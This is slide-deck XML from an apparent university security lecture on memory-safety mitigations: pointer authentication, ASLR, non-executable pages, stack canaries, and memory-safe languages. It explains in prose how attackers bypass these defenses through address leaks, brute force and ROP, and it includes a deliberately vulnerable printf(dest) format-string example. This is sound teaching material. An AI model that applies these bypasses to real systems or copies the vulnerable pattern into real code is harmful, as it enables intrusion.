              <a:rPr lang="en" b="1"/>
              <a:t>pointer authentication code (PAC)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using the pointer in memory, check if the PAC is still valid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PAC is invalid, crash the program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PAC is valid, restore the unused bits and use the address normally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the RIP, SFP, any other pointers on the stack, and any other pointers outside of the stack (e.g. on the heap)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="747" name="Google Shape;747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Authentication: Properties of the PAC</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="753" name="Google Shape;753;p8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possible address has its own PAC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The PAC for the address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0x000000007ffffec0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is different from the PAC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0x000000007ffffec4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changes the address without changing the PAC, the PAC will no longer be valid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someone who knows the CPU’s master secret can generate a PAC for an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cannot generate a PAC for their malicious pointer without the master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cannot generate a PAC using a PAC for a different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Later: We’ll discuss how this algorithm works (MACs in the cryptography unit)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CPU’s master secret is not accessible to the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Leaking program memory will not leak the master secret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Contrast with canaries, which can be leaked</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="754" name="Google Shape;754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Pointer Authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="760" name="Google Shape;760;p8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vulnerability to trick the program to generating a PAC for any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the master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operating system has to set up the secrets: What if there is a vulnerability in the OS?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Workaround: Embed the master secret in the CPU, which can only be used to generate PACs, never read directly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a PAC: Brute-force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64-bit systems use 48 bits for addressing, so there are only 22 bits left for the PAC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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000"/>
              <a:t>22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> bits ≈ 4 million possibilities, so possibly feasible depending on your threat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 reuse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CPU already generated another PAC for another pointer, we can copy that pointer and use it elsewhere</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="761" name="Google Shape;761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Defenses Against Pointer Reuse</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="767" name="Google Shape;767;p8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there are usually multiple master secrets for different types of pointers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uses 5 master secrets: 2 instruction pointer secrets (IA and IB), 2 data pointer secrets (DA and DB), and 1 general-purpose secret (GA)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 pointer secrets are used for pointers to machine instructions (e.g. RIP)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pointer secrets are used for pointers to data (e.g. local variables)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pointers can’t be reused as instruction pointers, and vice-versa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 can generate a unique PAC for each pointer and “context”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Context: usually the address where the pointer is located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pointer will have a different PAC depending on where in memory it's located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copies a pointer and PAC to a different location, the PAC is no longer valid!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="768" name="Google Shape;768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 on ARM</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="774" name="Google Shape;774;p8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 authentication is supported by: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8.3 (a new architecture, like x86 or RISC-V)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latest Apple chips (starting with the A12 and including the new M1), which use ARM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macOS on ARM (operating system)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the biggest benefit for Apple going to ARM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take advantage of the more efficient instructions instead of backwards-compatible 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Usable in both standard user programs and kernel programs (privileged code run by the OS)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x86 has not developed a similar defense</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="775" name="Google Shape;775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Memory-Safe Languages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Memory-safe languages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> are designed to check bounds and prevent undefined memory accesses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design, memory-safe languages are not vulnerable to memory safety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memory-safe language is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> way to stop 100% of memory safety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Java, Python, C#, Go, Rust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languages besides C, C++, and Objective C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Address Space Layout Randomization (ASLR)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="781" name="Google Shape;781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Address-space layout randomization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Overwrite the RIP with the address of the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Stack canaries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Pointer authentication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789" name="Google Shape;789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790" name="Google Shape;790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796" name="Google Shape;796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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="797" name="Google Shape;797;p89"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="798" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="14831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8" name="Google Shape;798;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8568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799" name="Google Shape;799;p89"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="800" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14831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0" name="Google Shape;800;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8568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01" name="Google Shape;801;p89"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2109350" y="1221150"/>
          <a:ext cx="1522325" cy="28795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2" name="Google Shape;802;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2358100" y="2431000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upwards</a:t>
            </a:r>
            <a:endParaRPr sz="800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="803" name="Google Shape;803;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867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theory, x86 memory layout looks like this...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4" name="Google Shape;804;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2358100" y="1773675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downwards</a:t>
            </a:r>
            <a:endParaRPr sz="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810" name="Google Shape;810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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="811" name="Google Shape;811;p90"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="812" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="14831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2" name="Google Shape;812;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8568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13" name="Google Shape;813;p90"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="814" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14831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4" name="Google Shape;814;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8568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15" name="Google Shape;815;p90"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2109350" y="1221150"/>
          <a:ext cx="1522325" cy="28795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6" name="Google Shape;816;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2358100" y="1773675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downwards</a:t>
            </a:r>
            <a:endParaRPr sz="800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="817" name="Google Shape;817;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2358100" y="2431000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upwards</a:t>
            </a:r>
            <a:endParaRPr sz="800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="818" name="Google Shape;818;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867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theory, x86 memory layout looks like this...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19" name="Google Shape;819;p90"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="820" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="50645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0" name="Google Shape;820;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="44382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21" name="Google Shape;821;p90"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="822" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="50645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2" name="Google Shape;822;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="44382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23" name="Google Shape;823;p90"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5690750" y="1221150"/>
          <a:ext cx="1522325" cy="292812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24" name="Google Shape;824;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="43681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...but in practice, it usually looks like this (mostly empty)!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830" name="Google Shape;830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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="831" name="Google Shape;831;p91"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="832" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2074600" y="15323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2" name="Google Shape;832;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1448350" y="11936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33" name="Google Shape;833;p91"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="834" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2074600" y="32498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4" name="Google Shape;834;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1448350" y="37955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35" name="Google Shape;835;p91"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4804675" y="1193663"/>
          <a:ext cx="1522325" cy="292812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36" name="Google Shape;836;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2528550" y="4360950"/>
            <a:ext cx="4086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Idea: Put each segment of memory in a different location each time the program is run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37" name="Google Shape;837;p91"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2817000" y="1193675"/>
          <a:ext cx="1522325" cy="29281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Space Layout Randomization</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="843" name="Google Shape;843;p9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Address space layout randomization (ASLR)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Put each segment of memory in a different location each time the program is run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can’t know where their shellcode will be because its address changes every time you run the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ASLR can shuffle all four segments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 the stack: Can’t place shellcode on the stack without knowing the address of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 the heap: Can’t place shellcode on the heap without knowing the address of the heap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 the code: Can’t construct a ROP chain or return-to-libc attack without knowing the address of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each segment of memory, relative addresses are the same (e.g. the RIP is always 4 bytes above the SFP)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="844" name="Google Shape;844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ASLR: Efficiency</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="850" name="Google Shape;850;p9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Programs are dynamically linked at runtime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already have to do the work of going through the executable and rewriting code to contain known addresses before executing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ASLR has effectively no overhead, since we have to do relocation anyway!</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="851" name="Google Shape;851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ASLR</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="857" name="Google Shape;857;p9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 the address of a pointer, whose address relative to your shellcode is known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addresses are usually fixed, so this is sufficient to undo randomization!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 a stack pointer: Leak the location of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 an RIP: Leak the location of the caller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the address of your shellcode: Brute-force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Randomization usually happens on page boundaries (usually 12 bits for 4 KiB pages)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32-bit: 32 - 12 = 20 bits, 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000"/>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> possible pages, which is feasibly brute-forced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64-bit (usually 48-bit addressing): 48 - 12 = 36 bits, 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" baseline="30000"/>
              <a:t>36</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> possible pages</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="858" name="Google Shape;858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Addresses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="864" name="Google Shape;864;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="2315225"/>
            <a:ext cx="2919000" cy="1877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vulnerable(char *dest)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Format string vulnerability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printf(dest);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fgets(buf, 20, stdin);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65" name="Google Shape;865;p9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dest (arg to vulnerable)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format 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66" name="Google Shape;866;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3154900" y="1253200"/>
            <a:ext cx="29061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know that the SFP is a pointer to the stack. How would you print the value of the SFP?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7" name="Google Shape;867;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3154900" y="3639150"/>
            <a:ext cx="24399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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is 4 bytes below where the SFP points, so its address is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0xbfff0404</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="868" name="Google Shape;868;p95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8475075" y="2402900"/>
            <a:ext cx="415650" cy="2201575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="16626" h="88063" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="88063"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16626" y="88063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16626" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597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9" name="Google Shape;869;p95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8475075" y="3864125"/>
            <a:ext cx="207825" cy="246775"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8313" h="9871" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="9871"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8313" y="9871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8313" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2598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70" name="Google Shape;870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871" name="Google Shape;871;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3169650" y="2177925"/>
            <a:ext cx="101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Input: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Google Shape;872;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3169650" y="2898475"/>
            <a:ext cx="2772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the output is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bfff0408</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> what is the address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9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78" name="Google Shape;878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Non-Memory-Safe Languages?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commonly-cited reason: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>performance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Comparison of memory allocation performance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 and C++ (not memory safe):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 dirty="0"/>
              <a:t> usually runs in (amortized) constant-time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Java (memory safe): The garbage collector may need to run at any arbitrary point in time, adding a 10–100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> delay as it cleans up memory</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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9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85" name="Google Shape;885;p9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We can use multiple mitigations together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Synergistic protection: one mitigation helps strengthen another mitigation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Force the attacker to find multiple vulnerabilities to exploit the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 in depth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Combining ASLR and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can't write their own shellcode, because of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can't use existing code in memory, because they don't know the addresses of those code (ASLR)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defeat ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> non-executable pages, the attacker needs to find two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First, find a way to leak memory and reveal the address randomization (defeat ASLR)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Second, find a way to write to memory and write a ROP chain (defeat non-executable pages)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="886" name="Google Shape;886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9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92" name="Google Shape;892;p9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safety defenses used by Apple iOS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ASLR is used for user programs (apps) and kernel programs (operating system programs)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Non-executable pages are used whenever possible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are sandboxed to limit the damage of an exploit (TCB is the operating system)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Trident exploit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Developed by the NSO group, a spyware vendor, to exploit iPhones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Safari with a memory corruption vulnerability → execute arbitrary code in the sandbox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another vulnerability to read the kernel stack (operating system memory in the sandbox)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another vulnerability in the kernel (operating system) to execute arbitrary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Combining mitigations forces the attacker to find multiple vulnerabilities to take over your program. The attacker's job is harder, but not impossible!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="893" name="Google Shape;893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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="899" name="Google Shape;899;p9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mitigations (stack canaries, non-executable pages, ASLR) are effectively free today (insignificant performance impact)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programmer sometimes has to manually enable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Enable ASLR and non-executable pages when running a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Setting a flag to compile a program with stack canaries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default is disabling the mitigation, the default will be chosen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Consider human factors!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Use fail-safe defaults!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="900" name="Google Shape;900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Mitigations: CISCO</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="906" name="Google Shape;906;p10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Cisco’s Adaptive Security Appliance (ASA)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Cisco: A major vendor of technology products (one of 30 giant companies in the Dow Jones stock index)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ASA: A network security device that can be installed to protect an entire network (e.g. AirBears2)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Mitigations used by the ASA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ASLR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for the NSA (or other attackers) to exploit!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Even major companies can forget to enable mitigations. Always enable memory safety mitigations!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="907" name="Google Shape;907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0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Mitigations: Internet of Things</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="913" name="Google Shape;913;p101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Takeaway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Many (most?) IoT devices don’t enable basic mitigations</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="914" name="Google Shape;914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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="915" name="Google Shape;915;p101"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="288475" y="1431735"/>
          <a:ext cx="8567050" cy="218691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428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10858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Qualys Security Blog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CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)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595959"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Animesh Jain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595959"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>January 26, 2021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The Qualys Research Team has discovered a heap overflow vulnerability in sudo, a near-ubiquitous utility available on major Unix-like operating systems. Any unprivileged user can gain root privileges on a vulnerable host using a default sudo configuration by exploiting this vulnerability.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16" name="Google Shape;916;p101" title="Qualys Security Blo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00" y="1460775"/>
            <a:ext cx="107967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22" name="Google Shape;922;p10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Memory-safe languages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memory-safe language (e.g. Python, Java) stops all memory safety vulnerabilities.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use a non-memory-safe language?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Commonly-cited reason, but mostly a myth: Performance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Real reason: Legacy, existing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memory-safe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Carefully write and reason about your code to ensure memory safety in a non-memory-safe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programmer discipline, and can be tedious sometimes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secure software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your code for memory safety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any external libraries updated for security patches</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="923" name="Google Shape;923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0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29" name="Google Shape;929;p10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portions of memory either executable or writable, but not both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writing shellcode to memory and executing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Return-to-libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Execute an existing function in the C library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Return-oriented programming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>): Create your own code by chaining together small gadgets in existing library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sacrificial value on the stack. If the canary has been changed, someone’s probably attacking our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overwriting the RIP with address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 attacker can write around the canary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canary can be leaked by another vulnerability (e.g. format string vulnerability)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canary can be brute-forced by the attacker</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="930" name="Google Shape;930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0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36" name="Google Shape;936;p10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Pointer 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storing a pointer in memory, replace the unused bits with a pointer authentication code (PAC). Before using the pointer in memory, check if the PAC is still valid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overwriting the RIP (or any pointer) with address of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Address space layout randomization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>ASLR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each segment of memory in a different location each time the program is run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knowing the address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Leak addresses with another vulnerability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Brute-force attack to guess the addresses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multiple mitigations usually forces the attacker to find multiple vulnerabilities to exploit the program (defense-in-depth)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="937" name="Google Shape;937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0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Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="943" name="Google Shape;943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0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 Instruction Pointers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="950" name="Google Shape;950;p10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Remember: You need to overwrite a pointer that will eventually be jumped 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smashing involves the RIP, but there are other targets too (literal function pointers, etc.)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="951" name="Google Shape;951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Cited Reason: The Myth of Performance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most applications, the performance difference from using a memory-safe language is insignificant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Possible exceptions: Operating systems, high performance games, some embedded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C’s improved performance is not a direct result of its security issues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Historically, safer languages were slower, so there was a tradeoff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Today, safe alternatives have comparable performance (e.g. Go and Rust)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Secure C code (with bounds checking) ends up running as quickly as code in a memory-safe language anyway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don’t need to pick between security and performance: You can have both!</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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0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957" name="Google Shape;957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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="958" name="Google Shape;958;p10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is an object-oriented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objects can have instance variables and methods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has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>polymorphism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: implementations of an interface can implement functions differently, similar to Java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achieve this, each class has a vtable (table of function pointers), and each object points to its class’s vtable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vtable pointer is usually at the beginning of the object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execute a function: Dereference the vtable pointer with an offset to find the function address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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="964" name="Google Shape;964;p10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965" name="Google Shape;965;p108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385375" y="4284600"/>
            <a:ext cx="335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an object of type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/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is an object of type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/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="966" name="Google Shape;966;p108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67" name="Google Shape;967;p108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968" name="Google Shape;968;p108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69" name="Google Shape;969;p108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70" name="Google Shape;970;p108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1" name="Google Shape;971;p108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72" name="Google Shape;972;p108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73" name="Google Shape;973;p108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4" name="Google Shape;974;p108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5" name="Google Shape;975;p108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976" name="Google Shape;976;p108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108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978" name="Google Shape;978;p108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9" name="Google Shape;979;p108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sp>
        <p:nvSpPr>
          <p:cNvPr id="985" name="Google Shape;985;p10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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="986" name="Google Shape;986;p109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87" name="Google Shape;987;p109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988" name="Google Shape;988;p109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89" name="Google Shape;989;p109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90" name="Google Shape;990;p109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91" name="Google Shape;991;p109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92" name="Google Shape;992;p109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93" name="Google Shape;993;p109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4" name="Google Shape;994;p109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5" name="Google Shape;995;p109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996" name="Google Shape;996;p109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385375" y="4284600"/>
            <a:ext cx="32535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call a method of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, first follow a pointer on the heap to find the vtable…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p109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109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999" name="Google Shape;999;p109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0" name="Google Shape;1000;p109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1" name="Google Shape;1001;p109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3752475" y="4267000"/>
            <a:ext cx="32535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then follow a pointer in the vtable to find the instructions of the method.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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1007" name="Google Shape;1007;p1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1008" name="Google Shape;1008;p110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385375" y="4284600"/>
            <a:ext cx="335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one of the instance variables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buffer we can overflow.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09" name="Google Shape;1009;p110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10" name="Google Shape;1010;p110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11" name="Google Shape;1011;p110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2" name="Google Shape;1012;p110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13" name="Google Shape;1013;p110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4" name="Google Shape;1014;p110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15" name="Google Shape;1015;p110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16" name="Google Shape;1016;p110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7" name="Google Shape;1017;p110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8" name="Google Shape;1018;p110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19" name="Google Shape;1019;p110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Google Shape;1020;p110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21" name="Google Shape;1021;p110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2" name="Google Shape;1022;p110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sp>
        <p:nvSpPr>
